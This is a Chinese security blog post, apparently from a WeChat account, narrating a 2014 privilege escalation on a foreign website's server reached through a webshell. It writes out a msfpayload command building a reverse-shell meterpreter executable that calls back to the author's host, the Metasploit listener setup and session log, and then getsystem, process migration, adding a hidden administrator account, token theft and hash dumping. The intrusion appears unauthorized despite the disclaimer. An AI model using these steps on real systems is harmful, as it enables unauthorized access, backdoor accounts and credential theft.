记一次提权添加管理员实战案例

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签:

#Web安全   #漏洞复现   #工具使用   #权限提升

#权限维持   #防护绕过   #内网安全   #实战案例

#其他笔记   #资源分享   #MSF


0x01 前言

这个案例记录的是笔者2014年测试的一台服务器,闲着无聊之时在“中国菜刀”上找了一个以前的意大利站点做测试,这是很久以前的站了,都忘了有没有提权过了,试了下刚放出来的CVE-2014-4113都失败了,执行后无回显。


0x02 实战提权过程

首先我们先利用Metasploit的msfpayload命令生成一个普通的exe载荷上传至目标可读写目录中,配置好监听模块的相关参数,然后执行即可得到一个普通权限的会话。
msfpayload windows/meterpreter/reverse_tcp lhost=1*3.2*1.*7.*7 lport=7777 X > /media/sf_系统学习/test.exe
记一次提权添加管理员实战案例


注:这里提一下为什么我们生成载荷时填的公网IP,而在配置监听模块时填的内网IP?那是因为当时是用本地局域网的kali进行测试的,最后是用路由器的端口映射功能将Kali的7777端口映射出来的。

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.4msf exploit(handler) > set LPORT 7777msf exploit(handler) > exploit 
[*] Started reverse handler on 192.168.1.4:7777 [*] Starting the payload handler...[*] Sending stage (770048 bytes) to 6*.7*.2*3.5*[*] Meterpreter session 6 opened (192.168.1.4:7777 -> 6*.7*.2*3.5*:2446) at 2014-10-26
记一次提权添加管理员实战案例


习惯性的先执行了下getsystem命令居然成功将权限提升至SYSTEM,接着测试了下其它命令,当我们测试到shell命令时发现虽然已经进入到命令终端了,但是依旧为zorroiwam_server普通权限。

记一次提权添加管理员实战案例
记一次提权添加管理员实战案例


通过Google搜索看到Hak5安全社区中有人也提到过类似问题,解决办法大概意思就是说我们需要先将当前会话的进程迁移至Admin/System权限运行的进程上去,然后才能有权限添加管理员用户。

  • https://forums.hak5.org/index.php?/topic/26576-adding-new-user-in-windows-from-a-meterpreter-shell/

Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with. 
After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.


目前因权限不够而暂时无法直接在命令终端添加管理员用户,那么还有什么方法可以添加管理员用户或者得到目标管理员的密码呢?这里笔者另外提供几种思路,仅供参考,1-2断开会话,3-5已成功!


(1) run getgui -u test$ -p 123456(添加管理员)

记一次提权添加管理员实战案例


(2) migrate 3760(迁移到system运行的进程)

记一次提权添加管理员实战案例


(3) use incognito(加载incognito扩展)

记一次提权添加管理员实战案例


(4) hashdump(获取系统hash值并破解)

记一次提权添加管理员实战案例


(5) 其它方法,如:mimikatz扩展、smart_hashdump模块等方法




只需在公众号回复“9527”即可领取一套HTB靶场学习文档和视频,1120领取安全参考等安全杂志PDF电子版1208领取一份常用高效爆破字典还在等什么?

记一次提权添加管理员实战案例

本文始发于微信公众号(潇湘信安):记一次提权添加管理员实战案例

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: